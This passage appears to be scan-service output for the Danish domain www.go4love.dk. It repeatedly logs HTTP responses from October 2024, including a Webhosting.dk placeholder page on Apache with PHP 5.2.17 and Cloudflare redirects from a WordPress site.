target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:443 · www.go4love.dk
2024-10-20 12:22
HTTP/1.1 200 OK Date: Sun, 20 Oct 2024 12:22:26 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache 2.2 Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:80 · www.go4love.dk
2024-10-20 05:59
HTTP/1.1 200 OK Date: Sun, 20 Oct 2024 05:59:01 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 188.114.97.3:443 · www.go4love.dk
2024-10-20 05:49
HTTP/1.1 301 Moved Permanently Date: Sun, 20 Oct 2024 05:49:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2KKdsh0QJ653NYGRGR4Cx5PXMKgXvk6wPBcHzjg6W7cYBLZclUAzfzhXMgepKuTh6VfZftz9CUdcQl%2BkbPjP4amShLQC7yKdhhm%2FSdVPjO59FFN3RYWGPOQcvvRP%2F7VdQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d56ba041cb0470d-BOM alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13548&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3094&recv_bytes=560&delivery_rate=320212&cwnd=220&unsent_bytes=0&cid=2f90bfc42d57ebb8&ts=366&x=0"
Open service 81.19.232.105:443 · www.go4love.dk
2024-10-18 15:02
HTTP/1.1 200 OK Date: Fri, 18 Oct 2024 15:02:07 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache 2.2 Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 188.114.97.3:443 · www.go4love.dk
2024-10-18 05:57
HTTP/1.1 301 Moved Permanently Date: Fri, 18 Oct 2024 05:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouEB88CBonkNM4anKrfCk9dDxuP3iDFf%2Btis0vXUL%2Bdmi29DFvILKR7EZt42WV0KM31sUXdqkUjlmwENYpOvQ98RF4cmzzK65Iea7XHsJJKYc7rtry%2FWTfRwlo5bvO7jfA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d464a037d344938-BOM alt-svc: h3=":443"; ma=86400
Open service 81.19.232.105:80 · www.go4love.dk
2024-10-18 05:35
HTTP/1.1 200 OK Date: Fri, 18 Oct 2024 05:35:47 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:443 · www.go4love.dk
2024-10-16 22:31
HTTP/1.1 200 OK Date: Wed, 16 Oct 2024 22:31:07 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache 2.2 Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 81.19.232.105:80 · www.go4love.dk
2024-10-16 09:58
HTTP/1.1 200 OK Date: Wed, 16 Oct 2024 09:58:30 GMT Content-Type: text/html Content-Length: 830 Connection: close X-Powered-By: PHP/5.2.17 Vary: Accept-Encoding Server: Apache Page title: Hjemmeside hosting - Webhosting.dk www.go4love.dk <html> <head> <style type="text/css"> h1 {color:black; font-family : Verdana, Arial;font-size : 22px;} h2 {color:black; font-family : Verdana, Arial;font-size : 21px;} h3 {color:black; font-family : Verdana, Arial;font-size : 20px;} </style> </head> <body> <title>Hjemmeside hosting - Webhosting.dk www.go4love.dk</title> <center> <br> <font face='verdana,arial' size='4'>Vi hoster http://www.go4love.dk<br><br> Contact owner using this address: <a href='https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk' target=_blank><b>https://punktum.dk/domaene/ikke-tilg%C3%A6ngelig?domain=go4love.dk</b></a><br><br> <center><font face='verdana,arial'>This domain is hosted with <a href='https://www.webhosting.dk?fromdomain=www.go4love.dk'><b><font face='verdana,arial'>https://www.webhosting.dk</b></a> </body> </html>
Open service 188.114.97.3:443 · www.go4love.dk
2024-10-16 09:21
HTTP/1.1 301 Moved Permanently Date: Wed, 16 Oct 2024 09:21:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-redirect-by: WordPress location: https://go4love.dk/ vary: User-Agent x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kKDufud18VxvV2FXvlry7iwEyKL99LfJtDU1Uvj%2BrqhYGuHFYggjOgebQVG5Zg%2FHAFBAfH2aiooYTLzhdq4g%2BacI3%2BIbjkPzPyOncueuCLZDoaJN%2FEiepFCw4rf6UvX6PQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8d36fac0ec265c48-AMS alt-svc: h3=":443"; ma=86400